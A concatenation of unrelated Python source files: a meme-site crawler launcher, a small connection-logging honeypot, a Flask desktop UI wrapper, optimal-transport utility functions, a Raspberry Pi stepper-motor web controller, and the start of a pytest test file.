'tumblr.tastefullyoffensive.com', 'meme-fire.tumblr.com', 'im-sad-and-i-like-memes.tumblr.com',
'forthefuns.tumblr.com', 'thesoberbitch.tumblr.com', 'memeosas.tumblr.com', 'memes-r-memes.tumblr.com',
'spicymemesociety.tumblr.com', 'catchymemes.com', 'memeuplift.tumblr.com', 'the-suburban-craft.tumblr.com',
'annoyingmemes.tumblr.com', 'omghotmemes.tumblr.com', 'forever-memes.tumblr.com', 'thatfunnymeme.tumblr.com',
'memelord18.tumblr.com', 'xno-chill-memesx.tumblr.com', 'lobotomizedbrain.tumblr.com', 'meme-gutter.tumblr.com',
'sassysaidie.tumblr.com', 'browsedankmemes.com'
]
if __name__ == '__main__':
signal.signal(signal.SIGCHLD, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
srs = [sub_reddit.replace('r/', '') for sub_reddit in sub_reddit_accounts]
nine_proc = NineGagCrawler(google_queue=google_queue)
fj_proc = FunnyJunkCrawler(google_queue=google_queue)
on_sizzle_proc = OnSizzleCrawler(google_queue=google_queue)
imgflip_proc = ImgFlipCrawler(google_queue=google_queue)
imgur_proc = ImgurCrawler(google_queue=google_queue)
meme_xyz_proc = MemeXYZCrawler(google_queue=google_queue)
meme_proc = MeMeCrawler(google_queue=google_queue)
memedroid_proc = MemedroidCrawler(google_queue=google_queue)
vifunow_proc = VifunowCrawler(google_queue=google_queue)
quora_treasury_proc = QuoraTreasuryCrawler(google_queue=google_queue)
cheez_burger_proc = CheezBurgerCrawler(google_queue=google_queue)
the_chive_proc = TheChiveCrawler(google_queue=google_queue)
ruin_my_week_proc = RuinMyWeekCrawler(google_queue=google_queue)
dump_a_day_proc = DumpADayCrawler(google_queue=google_queue)
troll_street_proc = TrollStreetCrawler(google_queue=google_queue)
the_humor_train_proc = TheHumorTrainCrawler(google_queue=google_queue)
ifunny_proc = IfunnyCrawler(google_queue=google_queue)
ladnow_proc = LadnowCrawler(google_queue=google_queue)
meme_generator_proc = MemeGeneratorCrawler(google_queue=google_queue)
buzzfeed_proc = BuzzFeedCrawler(google_queue=google_queue)
meme_guy_proc = MemeGuyCrawler(google_queue=google_queue)
dopl3r_proc = Dopl3rCrawler(google_queue=google_queue)
the_funny_beaver_proc = TheFunnyBeaverCrawler(google_queue=google_queue)
funny_memes_proc = FunnyMemesCrawler(google_queue=google_queue)
le_funny_proc = LeFunnyCrawler(google_queue=google_queue)
dank_meme_team = DankMemeTeamCrawler(google_queue=google_queue)
funny_photo = FunnyPhotoCrawler(google_queue=google_queue)
img_lulz = ImgLulzCrawler(google_queue=google_queue)
huge_lol = HugeLolCrawler(google_queue=google_queue)
daily_pic_dump = DailyPicDumpCrawler(google_queue=google_queue)
call_center_memes = CallCenterMemesCrawler(google_queue=google_queue)
pr0gramm_crawler = Pr0grammCrawler(google_queue=google_queue)
trend_uso_crawler = TrendUSOMemesCrawler(google_queue=google_queue)
best_funny_pic_crawler = BestFunnyPicCrawler(google_queue=google_queue)
joy_reactor_crawler = JoyReactorCrawler(google_queue=google_queue)
beer_money_pizza_crawler = BeerMoneyPizzaCrawler(google_queue=google_queue)
hidden_lol_crawler = HiddenLolCrawler(google_queue=google_queue)
fun_substance_crawler = FreshSubstanceCrawler(google_queue=google_queue)
nine_buzz_crawler = NineBuzzCrawler(google_queue=google_queue)
the_meta_picture_crawler = TheMetaPictureCrawler(google_queue=google_queue)
daily_haha_crawler = DailyHahaCrawler(google_queue=google_queue)
dev_humor_crawler = DevHumorCrawler(google_queue=google_queue)
iwsmt_crawler = IWSMTCrawler(google_queue=google_queue)
four_pm_happy_hour_crawler = FourPMHappyHourCrawler(google_queue=google_queue)
kontraband_crawler = KontrabandCrawler(google_queue=google_queue)
still_cracking_crawler = StillCrackingCrawler(google_queue=google_queue)
meme_collection_crawler = MemeCollectionCrawler(google_queue=google_queue)
slow_robot_crawler = SlowRobotCrawler(google_queue=google_queue)
wanna_joke_crawler = WannaJokeCrawler(google_queue=google_queue)
some_ecards_crawler = SomeEcardsCrawler(google_queue=google_queue)
laugh_tard_crawler = LaughTardCrawler(google_queue=google_queue)
humour_spot_crawler = HumourSpotCrawler(google_queue=google_queue)
put_me_like_crawler = PutMeLikeCrawler(google_queue=google_queue)
spastic_bastard_crawler = SpasticBastardCrawler(google_queue=google_queue)
saying_images_crawler = SayingImagesCrawler(google_queue=google_queue)
fun_pic_crawler = FunPicCrawler(google_queue=google_queue)
barnorama_crawler = BarnoramaCrawler(google_queue=google_queue)
fun_mary_crawler = FunMaryCrawler(google_queue=google_queue)
gorilla_feed_crawler = GorillaFeedCrawler(google_queue=google_queue)
one_jux_crawler = OneJuxCrawler(google_queue=google_queue)
odd_stuff_magazine_crawler = OddStuffMagazineCrawler(google_queue=google_queue)
love_for_quotes_crawler = LoveForQuotesCrawler(google_queue=google_queue)
bored_panda_crawler = BoredPandaCrawler(google_queue=google_queue)
ebaums_world_crawler = EbaumsWorldCrawler(google_queue=google_queue)
thunder_dungeon_crawler = ThunderDungeonCrawler(google_queue=google_queue)
zodab_crawler = ZodabCrawler(google_queue=google_queue)
funny_captions_crawler = FunnyCaptionsCrawler(google_queue=google_queue)
fame_pace_crawler = FamePaceCrawler(google_queue=google_queue)
funny_memes_4u_crawler = FunnyMemes4UCrawler(google_queue=google_queue)
epic_pix_crawler = EpicPixCrawler(google_queue=google_queue)
lol_damn_crawler = LolDamnCrawler(google_queue=google_queue)
uber_humor_crawler = UberHumorCrawler(google_queue=google_queue)
just_viral_crawler = JustViralCrawler(google_queue=google_queue)
acid_cow_crawler = AcidCowCrawler(google_queue=google_queue)
clean_memes_crawler = CleanMemesCrawler(google_queue=google_queue)
the_last_thing_crawler = TheLastThingCrawler(google_queue=google_queue)
astrology_memes_crawler = AstrologyMemesCrawler(google_queue=google_queue)
thug_life_meme_crawler = ThugLifeMemeCrawler(google_queue=google_queue)
# evil_milk_crawler = EvilMilkCrawler(google_queue=google_queue) --not meme
reddit_thread = RedditCrawler(sub_reddits=srs, google_queue=google_queue)
ig_thread = InstagramCrawler(handles=ig_accounts, google_queue=google_queue)
tumblr_thread = TumblrCrawler(blogs=tumblr_blogs, google_queue=google_queue)
four_chan_thread = FourChanCrawler(boards=four_chan_boards, google_queue=google_queue)
facebook_thread = FacebookCrawler(pages=facebook_pages_list, google_queue=google_queue)
twitter_thread = TwitterCrawler(handles=twitter_accounts_list, google_queue=google_queue)
izismile_crawler = IzismileCrawler(google_queue=google_queue)
quotes_n_humor_crawler = QuotesNHumorCrawler(google_queue=google_queue)
screen_eggs_crawler = ScreenEggsCrawler(google_queue=google_queue)
collect_new_data = True
for x in range(0, 8):
google_vision_thread = threading.Thread(target=_vision_thread)
google_vision_thread.start()
if collect_new_data:
fj_proc.start()
nine_proc.start()
on_sizzle_proc.start()
imgflip_proc.start()
imgur_proc.start()
meme_xyz_proc.start()
memedroid_proc.start()
vifunow_proc.start()
# quora_treasury_proc.start() #offline
cheez_burger_proc.start()
the_chive_proc.start()
ruin_my_week_proc.start()
dump_a_day_proc.start()
troll_street_proc.start()
the_humor_train_proc.start()
ifunny_proc.start()
meme_generator_proc.start()
buzzfeed_proc.start()
meme_guy_proc.start()
dopl3r_proc.start()
the_funny_beaver_proc.start()
# funny_memes_proc.start()
le_funny_proc.start()
dank_meme_team.start()
funny_photo.start()
img_lulz.start()
huge_lol.start()
daily_pic_dump.start()
call_center_memes.start()
pr0gramm_crawler.start()
trend_uso_crawler.start()
best_funny_pic_crawler.start()
joy_reactor_crawler.start()
beer_money_pizza_crawler.start()
hidden_lol_crawler.start()
fun_substance_crawler.start()
nine_buzz_crawler.start()
the_meta_picture_crawler.start()
daily_haha_crawler.start()
dev_humor_crawler.start()
iwsmt_crawler.start()
four_pm_happy_hour_crawler.start()
kontraband_crawler.start()
still_cracking_crawler.start()
meme_collection_crawler.start()
slow_robot_crawler.start()
wanna_joke_crawler.start()
some_ecards_crawler.start()
laugh_tard_crawler.start()
humour_spot_crawler.start()
put_me_like_crawler.start()
spastic_bastard_crawler.start()
saying_images_crawler.start()
fun_pic_crawler.start()
barnorama_crawler.start()
fun_mary_crawler.start()
gorilla_feed_crawler.start()
one_jux_crawler.start()
odd_stuff_magazine_crawler.start()
love_for_quotes_crawler.start()
bored_panda_crawler.start()
ebaums_world_crawler.start()
thunder_dungeon_crawler.start()
zodab_crawler.start()
funny_captions_crawler.start()
fame_pace_crawler.start()
# funny_memes_4u_crawler.start()
epic_pix_crawler.start()
lol_damn_crawler.start()
uber_humor_crawler.start()
just_viral_crawler.start()
acid_cow_crawler.start()
# evil_milk_crawler.start()
clean_memes_crawler.start()
the_last_thing_crawler.start()
astrology_memes_crawler.start()
thug_life_meme_crawler.start()
facebook_thread.start()
four_chan_thread.start()
reddit_thread.start()
ig_thread.start()
tumblr_thread.start()
twitter_thread.start()
izismile_crawler.start()
quotes_n_humor_crawler.start()
screen_eggs_crawler.start()
print("Sig Pause..")
signal.pause()
|
honeytrigger.py
|
import socket
import multiprocessing
import datetime
import atexit
import time
threads = []
def killthreads():
global threads
for t in threads:
t.terminate()
def log(data2log):
with open("logs.txt", "a") as f:
f.write(str(datetime.datetime.now()) + " | " + str(data2log) + "\n")
def listen(ip, port, send_message, message):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((ip, port))
s.listen()
while True:
c, addr = s.accept()
log("Connection accepted from " + str(addr) + " Port:" +str(port))
if send_message == 1:
try:
c.sendall(message.encode())
log("Message sent to" + str(addr) + " Port:" +str(port))
data = c.recv(4096)
log(f"Data - {str(data)} - received from " + str(addr) + " Port:" +str(port))
except:
pass
try:
c.shutdown(socket.SHUT_RDWR)
c.close()
except:
pass
log("Connection closed to " + str(addr) + " Port:" +str(port))
else:
try:
data = c.recv(4096)
log(f"Data - {str(data)} - received from " + str(addr) + " Port:" +str(port))
c.shutdown(socket.SHUT_RDWR)
c.close()
except:
pass
log("Connection closed to " + str(addr) + " Port:" +str(port))
def main():
global threads
ip = "0.0.0.0"
send_message = 0
message = "Blocked"
port_range = "3000,3500"
port_range = port_range.split(",")
for port in range(int(port_range[0]), int(port_range[1])):
p = multiprocessing.Process(target=listen, args=(ip, port, send_message, message))
p.start()
threads.append(p)
print("Done. Waiting for bears \n{} Threads Running".format(len(threads)))
log("Done. Waiting for bears, {} Threads Running".format(len(threads)))
if __name__ == "__main__":
atexit.register(killthreads)
main()
|
__init__.py
|
import socket
from threading import Thread
from flask_desktop_ui import chromium_browser_wrapper
LOCAL_HOST = '127.0.0.1'
RANDOM_PORT = 0
class FlaskDesktopUI(object):
def __init__(self, app):
self.port = _get_random_port()
self.flask_job = Thread(target=app.run, args=(LOCAL_HOST, self.port))
self.flask_job.daemon = True
def run(self):
self.flask_job.start()
chromium_browser_wrapper.initialize()
chromium_browser_wrapper.open_url('http://{ip}:{port}'.format(ip=LOCAL_HOST, port=self.port))
chromium_browser_wrapper.message_loop()
def _get_random_port():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCAL_HOST, RANDOM_PORT))
port = sock.getsockname()[1]
sock.close()
return port
|
utils.py
|
# -*- coding: utf-8 -*-
"""
Various function that can be usefull
"""
# Author: Remi Flamary <remi.flamary@unice.fr>
#
# License: MIT License
import multiprocessing
from functools import reduce
import time
import numpy as np
from scipy.spatial.distance import cdist
import sys
import warnings
try:
from inspect import signature
except ImportError:
from .externals.funcsigs import signature
__time_tic_toc = time.time()
def tic():
""" Python implementation of Matlab tic() function """
global __time_tic_toc
__time_tic_toc = time.time()
def toc(message='Elapsed time : {} s'):
""" Python implementation of Matlab toc() function """
t = time.time()
print(message.format(t - __time_tic_toc))
return t - __time_tic_toc
def toq():
""" Python implementation of Julia toc() function """
t = time.time()
return t - __time_tic_toc
def kernel(x1, x2, method='gaussian', sigma=1, **kwargs):
"""Compute kernel matrix"""
if method.lower() in ['gaussian', 'gauss', 'rbf']:
K = np.exp(-dist(x1, x2) / (2 * sigma**2))
return K
def unif(n):
""" return a uniform histogram of length n (simplex)
Parameters
----------
n : int
number of bins in the histogram
Returns
-------
h : np.array (n,)
histogram of length n such that h_i=1/n for all i
"""
return np.ones((n,)) / n
def clean_zeros(a, b, M):
""" Remove all components with zeros weights in a and b
"""
M2 = M[a > 0, :][:, b > 0].copy() # copy force c style matrix (froemd)
a2 = a[a > 0]
b2 = b[b > 0]
return a2, b2, M2
def euclidean_distances(X, Y, squared=False):
"""
Considering the rows of X (and Y=X) as vectors, compute the
distance matrix between each pair of vectors.
Parameters
----------
X : {array-like}, shape (n_samples_1, n_features)
Y : {array-like}, shape (n_samples_2, n_features)
squared : boolean, optional
Return squared Euclidean distances.
Returns
-------
distances : {array}, shape (n_samples_1, n_samples_2)
"""
XX = np.einsum('ij,ij->i', X, X)[:, np.newaxis]
YY = np.einsum('ij,ij->i', Y, Y)[np.newaxis, :]
distances = np.dot(X, Y.T)
distances *= -2
distances += XX
distances += YY
np.maximum(distances, 0, out=distances)
if X is Y:
# Ensure that distances between vectors and themselves are set to 0.0.
# This may not be the case due to floating point rounding errors.
distances.flat[::distances.shape[0] + 1] = 0.0
return distances if squared else np.sqrt(distances, out=distances)
def dist(x1, x2=None, metric='sqeuclidean'):
"""Compute distance between samples in x1 and x2 using function scipy.spatial.distance.cdist
Parameters
----------
x1 : np.array (n1,d)
matrix with n1 samples of size d
x2 : np.array (n2,d), optional
matrix with n2 samples of size d (if None then x2=x1)
metric : str, fun, optional
name of the metric to be computed (full list in the doc of scipy), If a string,
the distance function can be 'braycurtis', 'canberra', 'chebyshev', 'cityblock',
'correlation', 'cosine', 'dice', 'euclidean', 'hamming', 'jaccard', 'kulsinski',
'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto', 'russellrao', 'seuclidean',
'sokalmichener', 'sokalsneath', 'sqeuclidean', 'wminkowski', 'yule'.
Returns
-------
M : np.array (n1,n2)
distance matrix computed with given metric
"""
if x2 is None:
x2 = x1
if metric == "sqeuclidean":
return euclidean_distances(x1, x2, squared=True)
return cdist(x1, x2, metric=metric)
def dist0(n, method='lin_square'):
"""Compute standard cost matrices of size (n,n) for OT problems
Parameters
----------
n : int
size of the cost matrix
method : str, optional
Type of loss matrix chosen from:
* 'lin_square' : linear sampling between 0 and n-1, quadratic loss
Returns
-------
M : np.array (n1,n2)
distance matrix computed with given metric
"""
res = 0
if method == 'lin_square':
x = np.arange(n, dtype=np.float64).reshape((n, 1))
res = dist(x, x)
return res
def cost_normalization(C, norm=None):
""" Apply normalization to the loss matrix
Parameters
----------
C : np.array (n1, n2)
The cost matrix to normalize.
norm : str
type of normalization from 'median','max','log','loglog'. Any other
value do not normalize.
Returns
-------
C : np.array (n1, n2)
The input cost matrix normalized according to given norm.
"""
if norm == "median":
C /= float(np.median(C))
elif norm == "max":
C /= float(np.max(C))
elif norm == "log":
C = np.log(1 + C)
elif norm == "loglog":
C = np.log(1 + np.log(1 + C))
return C
def dots(*args):
""" dots function for multiple matrix multiply """
return reduce(np.dot, args)
def fun(f, q_in, q_out):
""" Utility function for parmap with no serializing problems """
while True:
i, x = q_in.get()
if i is None:
break
q_out.put((i, f(x)))
def parmap(f, X, nprocs=multiprocessing.cpu_count()):
""" paralell map for multiprocessing """
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
proc = [multiprocessing.Process(target=fun, args=(f, q_in, q_out))
for _ in range(nprocs)]
for p in proc:
p.daemon = True
p.start()
sent = [q_in.put((i, x)) for i, x in enumerate(X)]
[q_in.put((None, None)) for _ in range(nprocs)]
res = [q_out.get() for _ in range(len(sent))]
[p.join() for p in proc]
return [x for i, x in sorted(res)]
def check_params(**kwargs):
"""check_params: check whether some parameters are missing
"""
missing_params = []
check = True
for param in kwargs:
if kwargs[param] is None:
missing_params.append(param)
if len(missing_params) > 0:
print("POT - Warning: following necessary parameters are missing")
for p in missing_params:
print("\n", p)
check = False
return check
def check_random_state(seed):
"""Turn seed into a np.random.RandomState instance
Parameters
----------
seed : None | int | instance of RandomState
If seed is None, return the RandomState singleton used by np.random.
If seed is an int, return a new RandomState instance seeded with seed.
If seed is already a RandomState instance, return it.
Otherwise raise ValueError.
"""
if seed is None or seed is np.random:
return np.random.mtrand._rand
if isinstance(seed, (int, np.integer)):
return np.random.RandomState(seed)
if isinstance(seed, np.random.RandomState):
return seed
raise ValueError('{} cannot be used to seed a numpy.random.RandomState'
' instance'.format(seed))
class deprecated(object):
"""Decorator to mark a function or class as deprecated.
deprecated class from scikit-learn package
https://github.com/scikit-learn/scikit-learn/blob/master/sklearn/utils/deprecation.py
Issue a warning when the function is called/the class is instantiated and
adds a warning to the docstring.
The optional extra argument will be appended to the deprecation message
and the docstring. Note: to use this with the default value for extra, put
in an empty of parentheses:
>>> from ot.deprecation import deprecated
>>> @deprecated()
... def some_function(): pass
Parameters
----------
extra : string
to be added to the deprecation messages
"""
# Adapted from http://wiki.python.org/moin/PythonDecoratorLibrary,
# but with many changes.
def __init__(self, extra=''):
self.extra = extra
def __call__(self, obj):
"""Call method
Parameters
----------
obj : object
"""
if isinstance(obj, type):
return self._decorate_class(obj)
else:
return self._decorate_fun(obj)
def _decorate_class(self, cls):
msg = "Class %s is deprecated" % cls.__name__
if self.extra:
msg += "; %s" % self.extra
# FIXME: we should probably reset __new__ for full generality
init = cls.__init__
def wrapped(*args, **kwargs):
warnings.warn(msg, category=DeprecationWarning)
return init(*args, **kwargs)
cls.__init__ = wrapped
wrapped.__name__ = '__init__'
wrapped.__doc__ = self._update_doc(init.__doc__)
wrapped.deprecated_original = init
return cls
def _decorate_fun(self, fun):
"""Decorate function fun"""
msg = "Function %s is deprecated" % fun.__name__
if self.extra:
msg += "; %s" % self.extra
def wrapped(*args, **kwargs):
warnings.warn(msg, category=DeprecationWarning)
return fun(*args, **kwargs)
wrapped.__name__ = fun.__name__
wrapped.__dict__ = fun.__dict__
wrapped.__doc__ = self._update_doc(fun.__doc__)
return wrapped
def _update_doc(self, olddoc):
newdoc = "DEPRECATED"
if self.extra:
newdoc = "%s: %s" % (newdoc, self.extra)
if olddoc:
newdoc = "%s\n\n%s" % (newdoc, olddoc)
return newdoc
def _is_deprecated(func):
"""Helper to check if func is wraped by our deprecated decorator"""
if sys.version_info < (3, 5):
raise NotImplementedError("This is only available for python3.5 "
"or above")
closures = getattr(func, '__closure__', [])
if closures is None:
closures = []
is_deprecated = ('deprecated' in ''.join([c.cell_contents
for c in closures
if isinstance(c.cell_contents, str)]))
return is_deprecated
class BaseEstimator(object):
"""Base class for most objects in POT
adapted from sklearn BaseEstimator class
Notes
-----
All estimators should specify all the parameters that can be set
at the class level in their ``__init__`` as explicit keyword
arguments (no ``*args`` or ``**kwargs``).
"""
@classmethod
def _get_param_names(cls):
"""Get parameter names for the estimator"""
# fetch the constructor or the original constructor before
# deprecation wrapping if any
init = getattr(cls.__init__, 'deprecated_original', cls.__init__)
if init is object.__init__:
# No explicit constructor to introspect
return []
# introspect the constructor arguments to find the model parameters
# to represent
init_signature = signature(init)
# Consider the constructor parameters excluding 'self'
parameters = [p for p in init_signature.parameters.values()
if p.name != 'self' and p.kind != p.VAR_KEYWORD]
for p in parameters:
if p.kind == p.VAR_POSITIONAL:
raise RuntimeError("POT estimators should always "
"specify their parameters in the signature"
" of their __init__ (no varargs)."
" %s with constructor %s doesn't "
" follow this convention."
% (cls, init_signature))
# Extract and sort argument names excluding 'self'
return sorted([p.name for p in parameters])
def get_params(self, deep=True):
"""Get parameters for this estimator.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
out = dict()
for key in self._get_param_names():
# We need deprecation warnings to always be on in order to
# catch deprecated param values.
# This is set in utils/__init__.py but it gets overwritten
# when running under python3 somehow.
warnings.simplefilter("always", DeprecationWarning)
try:
with warnings.catch_warnings(record=True) as w:
value = getattr(self, key, None)
if len(w) and w[0].category == DeprecationWarning:
# if the parameter is deprecated, don't show it
continue
finally:
warnings.filters.pop(0)
# XXX: should we rather test if instance of estimator?
if deep and hasattr(value, 'get_params'):
deep_items = value.get_params().items()
out.update((key + '__' + k, val) for k, val in deep_items)
out[key] = value
return out
def set_params(self, **params):
"""Set the parameters of this estimator.
The method works on simple estimators as well as on nested objects
(such as pipelines). The latter have parameters of the form
``<component>__<parameter>`` so that it's possible to update each
component of a nested object.
Returns
-------
self
"""
if not params:
# Simple optimisation to gain speed (inspect is slow)
return self
valid_params = self.get_params(deep=True)
# for key, value in iteritems(params):
for key, value in params.items():
split = key.split('__', 1)
if len(split) > 1:
# nested objects case
name, sub_name = split
if name not in valid_params:
raise ValueError('Invalid parameter %s for estimator %s. '
'Check the list of available parameters '
'with `estimator.get_params().keys()`.' %
(name, self))
sub_object = valid_params[name]
sub_object.set_params(**{sub_name: value})
else:
# simple objects case
if key not in valid_params:
raise ValueError('Invalid parameter %s for estimator %s. '
'Check the list of available parameters '
'with `estimator.get_params().keys()`.' %
(key, self.__class__.__name__))
setattr(self, key, value)
return self
class UndefinedParameter(Exception):
"""
Aim at raising an Exception when a undefined parameter is called
"""
pass
|
DualStepperWeb.py
|
#!/usr/bin/python
#coding=utf-8
# Install in Linux bash
# Python3 –m http.server #
# sudo pip install simple_http_server #?
# sudo pip3 install Adafruit_MotorHAT
#
# 20190530 update
#
import os
import sys
import socket
import RPi.GPIO as GPIO # Check it in your windows or Raspbian platform
#import cgi #CGIHTTPServer CGIHTTPRequestHandler for the post
from http.server import BaseHTTPRequestHandler, HTTPServer # must be run python3 -m http.server
from Adafruit_MotorHAT import Adafruit_MotorHAT
import time
import atexit
import threading
import random
# create empty threads (these will hold the stepper 1 and 2 threads)
st1 = threading.Thread()
st2 = threading.Thread()
# create a default object, no changes to I2C address or frequency
mh = Adafruit_MotorHAT()
myStepper1 = mh.getStepper(200, 1) # 200 steps/rev, motor port #1
myStepper2 = mh.getStepper(200, 2) # 200 steps/rev, motor port #2
myStepper1.setSpeed(6) # RPM, DC motor from 0(off) to 255(max speed), Stepper motor(usually between 60-200)
myStepper2.setSpeed(6) # RPM, DC motor from 0(off) to 255(max speed), Stepper motor(usually between 60-200)
# direction
stepstyles = [Adafruit_MotorHAT.SINGLE, Adafruit_MotorHAT.DOUBLE, Adafruit_MotorHAT.INTERLEAVE, Adafruit_MotorHAT.MICROSTEP]
dir = Adafruit_MotorHAT.FORWARD
#dir = Adafruit_MotorHAT.BACKWARD
# recommended for auto-disabling motors on shutdown!
def turnOffMotors():
#mh.getStepper(0, 1).run(Adafruit_MotorHAT.RELEASE)
#mh.getStepper(0, 2).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(1).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(2).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(3).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(4).run(Adafruit_MotorHAT.RELEASE)
atexit.register(turnOffMotors) # 先註冊後執行(python離開時執行,防止步進電機進入卡死電流燒毀)
def stepper_worker(stepper, numsteps, direction, style):
global stop_threads
while stop_threads:
stepper.step(numsteps, direction, style)
stop_threads = True
st1 = threading.Thread(target=stepper_worker, args=(myStepper1, 20, dir, stepstyles[2],))
st1.start()
st2 = threading.Thread(target=stepper_worker, args=(myStepper2, 20, dir, stepstyles[2],))
st2.start()
########################################################################################
########################################################################################
class MytestHTTPServer(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def _redirect(self, path):
self.send_response(303)
self.send_header('Content-type', 'text/html')
self.send_header('Location', path)
self.end_headers()
def do_GET(self):
html = '''
<html>
<body style="width:960px; margin: 20px auto;">
<h1>The Stepping Motor Control Information</h1>
<a href="https://louisopen.github.io">Louis Web Linking</a>
<h3>http://louisopen.github.io</h3>
<p>Raspberry pi3 Current GPU temperature is {}</p>
<p><br>GPIO testting</p>
<form action="/" method="POST">
Turn LED :
<input type="submit" name="submit" value="On">
<input type="submit" name="submit" value="Off">
</form>
<p><br>Stepping Motor Control Dash-board</p>
<form action="/" method="POST">
Stepping Motor :
<input type="submit" name="submit" value="Hi-Speed">
<input type="submit" name="submit" value="Med-Speed">
<input type="submit" name="submit" value="Lo-Speed">
<input type="submit" name="submit" value="STOP">
<input type="submit" name="submit" value="Turn-Back">
</form>
<p><br>User RS-485 of uart communication default setting is 9600,N,8,1</p>
<form action="/" method="POST">
Uart Open/Close :
<input type="submit" name="submit" value="Open">
<input type="submit" name="submit" value="Close">
</form>
</body>
</html>
'''
temp = os.popen("/opt/vc/bin/vcgencmd measure_temp").read()
self.do_HEAD()
self.wfile.write(html.format(temp[5:]).encode("utf-8"))
def do_POST(self):
global dir,st1,st2,stop_threads
content_length = int(self.headers['Content-Length']) # Get the size of data
post_data = self.rfile.read(content_length).decode("utf-8") # Get the data
#post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
post_data = post_data.split("=")[1] # Only keep the value
# You now have a dictionary of the post data
print("Command is {}".format(post_data))
# GPIO setup
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(18,GPIO.OUT)
if post_data == 'On':
GPIO.output(18, GPIO.HIGH)
elif post_data == 'Off':
GPIO.output(18, GPIO.LOW)
elif post_data == 'Hi-Speed':
myStepper1.setSpeed(15)
myStepper2.setSpeed(15)
elif post_data == 'Med-Speed':
myStepper1.setSpeed(10)
myStepper2.setSpeed(10)
elif post_data == 'Lo-Speed':
myStepper1.setSpeed(6)
myStepper2.setSpeed(6)
elif post_data == 'STOP':
stop_threads = False
turnOffMotors()
st1.join()
st2.join()
else: #post_data == 'Turn-Back':
stop_threads = False
turnOffMotors()
st1.join()
st2.join()
time.sleep(0.2)
myStepper1.setSpeed(6)
myStepper2.setSpeed(6)
if dir == Adafruit_MotorHAT.FORWARD:
dir = Adafruit_MotorHAT.BACKWARD
else:
dir = Adafruit_MotorHAT.FORWARD
stop_threads = True
#if not st1.isAlive():
st1 = threading.Thread(target=stepper_worker, args=(myStepper1, 20, dir, stepstyles[2],))
st1.start()
#if not st2.isAlive():
st2 = threading.Thread(target=stepper_worker, args=(myStepper2, 20, dir, stepstyles[2],))
st2.start()
self._redirect('/') # Redirect back to the root url
#self.wfile.write("You finished it".encode("utf-8"))
def getIP():
#myname = socket.getfqdn(socket.gethostname())
get_s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
get_s.connect(('8.8.8.8', 0))
#ip = ('hostname: %s, localIP: %s') % (myname, get_s.getsockname()[0])
ip = ('%s') % (get_s.getsockname()[0])
return ip
def run():
if sys.argv[1:]:
host_port = int(sys.argv[1])
else:
host_port = 8000 # print('starting server, port', host_port)
host_name = getIP() # same the localhost ip host_name = '192.168.0.17'
# Server settings
server_address = (host_name, host_port)
httpd = HTTPServer(server_address, MytestHTTPServer)
#httpd = MyThreadingHTTPServer(('',8080), MytestHTTPServer)
#httpd = MyThreadingHTTPServer(server_address, MytestHTTPServer)
print('running server...', server_address)
#HandlerClass.protocol_version = Protocol # used SimpleHTTPRequestHandler
#httpd = ServerClass(server_address, HandlerClass) #used default server class
#sa = httpd.socket.getsockname()
#print "Serving HTTP on", sa[0], "port", sa[1], "..."
httpd.serve_forever()
if __name__ == '__main__':
run()
|
test_testsetup.py
|
import contextlib
import sys
from pathlib import Path
from unittest.mock import patch, Mock, call
import pytest
from threading import Thread
from time import sleep
from .helpers import build_tree
from headlock.testsetup import TestSetup, MethodNotMockedError, \
CProxyDescriptor, CProxyTypeDescriptor, BuildError, CompileError, CModule
from headlock.buildsys_drvs import default
from headlock.buildsys_drvs.gcc import GccBuildDescription, \
Gcc32BuildDescription
import headlock.c_data_model as cdm
@pytest.fixture
def TSDummy(tmpdir):
saved_sys_path = sys.path[:]
sys.path.append(str(tmpdir))
tmpdir.join('testsetup_dummy.py').write(
'class Container:\n'
' class TSDummy:\n'
' @classmethod\n'
' def __extend_by_transunit__(cls, transunit):\n'
' pass\n'
' @classmethod\n'
' def __extend_by_lib_search_params__(cls, req_libs,lib_dirs):\n'
' pass\n')
from testsetup_dummy import Container
sys.path = saved_sys_path
yield Container.TSDummy
del sys.modules['testsetup_dummy']
@contextlib.contextmanager
def sim_tsdummy_tree(base_dir, tree):
"""
Simulate, that TSDummy is located in 'base_dir' and 'tree' is the file
structure below this directory.
"""
global __file__
base_path = build_tree(base_dir, tree)
saved_file = __file__
__file__ = str(base_dir.join('test_testsetup.py'))
try:
yield base_path
finally:
__file__ = saved_file
class TestBuildError:
def test_getStr_withMsgOnlyParam_returnsStrWithTestSetupClassName(self):
exc = BuildError('error abc')
assert str(exc) == 'error abc'
def test_getStr_withTestSetupPassed_returnsStrWithTestSetupClassName(self):
filepath = Path('c_files/empty.c')
exc = BuildError('cannot do xyz', filepath)
assert str(exc) == f'building {filepath} failed: cannot do xyz'
class TestCompileError:
def test_getStr_returnsNumberOfErrors(self):
exc = CompileError([('err 1', 'file1.c', 3),
('err 2', 'file2.h', 3)],
Path('test.c'))
assert str(exc) == 'building test.c failed: 2 compile errors'
def test_iter_iteratesErrors(self):
errlist = [('err 1', 'file1.c', 3), ('err 2', 'file2.h', 3)]
exc = CompileError(errlist)
assert list(exc) == errlist
class TestCProxyTypeDescriptor:
@pytest.fixture
def Dummy(self):
class Dummy:
attr = CProxyTypeDescriptor(cdm.BuildInDefs.int)
return Dummy
def test_get_onClass_returnsCProxyType(self, Dummy):
assert Dummy.attr is cdm.BuildInDefs.int
def test_get_onInstance_returnsCProxyWithAddrspace(self, Dummy):
dummy = Dummy()
dummy.__addrspace__ = Mock()
assert isinstance(dummy.attr, cdm.CIntType)
